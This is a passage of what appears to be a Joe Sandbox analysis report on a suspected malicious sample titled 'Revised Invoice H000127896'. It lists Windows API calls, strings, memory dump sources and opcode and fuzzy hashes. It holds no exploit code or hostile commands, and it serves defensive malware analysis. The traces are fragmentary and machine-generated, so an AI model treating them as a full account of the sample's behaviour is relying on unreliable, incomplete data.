                              • _wcsncpy.LIBCMT ref: 0045CE39
                              • __wsplitpath.LIBCMT ref: 0045CE78
                              • _wcscat.LIBCMT ref: 0045CE8B
                              • _wcscat.LIBCMT ref: 0045CE9E
                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                              • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                              • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                              • _wcscpy.LIBCMT ref: 0045CF61
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                              • String ID: *.*
                              • API String ID: 1153243558-438819550
                              • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                              • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                              • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                              • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __wcsicoll
                              • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                              • API String ID: 3832890014-4202584635
                              • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                              • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                              • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                              • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                              APIs
                              • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                              • GetFocus.USER32 ref: 0046A0DD
                              • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessagePost$CtrlFocus
                              • String ID: 0
                              • API String ID: 1534620443-4108050209
                              • Opcode ID: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                              • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                              • Opcode Fuzzy Hash: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                              • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                              APIs
                              • DestroyWindow.USER32(?), ref: 004558E3
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Window$CreateDestroy
                              • String ID: ,$tooltips_class32
                              • API String ID: 1109047481-3856767331
                              • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                              • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                              • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                              • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                              APIs
                              • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                              • GetMenuItemCount.USER32(?), ref: 00468C45
                              • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                              • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                              • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                              • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                              • GetMenuItemCount.USER32 ref: 00468CFD
                              • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                              • GetCursorPos.USER32(?), ref: 00468D3F
                              • SetForegroundWindow.USER32(?), ref: 00468D49
                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                              • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                              • String ID: 0
                              • API String ID: 1441871840-4108050209
                              • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                              • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                              • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                              • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                              • __swprintf.LIBCMT ref: 00460915
                              • __swprintf.LIBCMT ref: 0046092D
                              • _wprintf.LIBCMT ref: 004609E1
                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                              • API String ID: 3631882475-2268648507
                              • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                              • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                              • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                              • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                              APIs
                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                              • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                              • SendMessageW.USER32 ref: 00471740
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                              • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                              • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                              • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                              • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                              • SendMessageW.USER32 ref: 0047184F
                              • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                              • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                              • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                              • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                              • String ID:
                              • API String ID: 4116747274-0
                              • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                              • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                              • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                              • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                              APIs
                              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                              • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                              • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: InfoItemMenu$Sleep
                              • String ID: 0
                              • API String ID: 1196289194-4108050209
                              • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                              • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                              • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                              • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                              APIs
                              • GetDC.USER32(00000000), ref: 0043143E
                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                              • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                              • SelectObject.GDI32(00000000,?), ref: 00431466
                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                              • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                              • String ID: (
                              • API String ID: 3300687185-3887548279
                              • Opcode ID: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                              • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                              • Opcode Fuzzy Hash: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                              • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                              APIs
                                • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                              • GetDriveTypeW.KERNEL32 ref: 0045DB32
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                              • API String ID: 1976180769-4113822522
                              • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                              • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                              • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                              • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                              • String ID:
                              • API String ID: 461458858-0
                              • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                              • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                              • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                              • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                              APIs
                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                              • GlobalLock.KERNEL32(00000000), ref: 004300F6
                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                              • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                              • CloseHandle.KERNEL32(00000000), ref: 00430113
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                              • GlobalFree.KERNEL32(00000000), ref: 00430150
                              • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                              • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                              • DeleteObject.GDI32(?), ref: 004301D0
                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                              • String ID:
                              • API String ID: 3969911579-0
                              • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                              • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                              • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                              • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                              • String ID: 0
                              • API String ID: 956284711-4108050209
                              • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                              • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                              • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                              • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
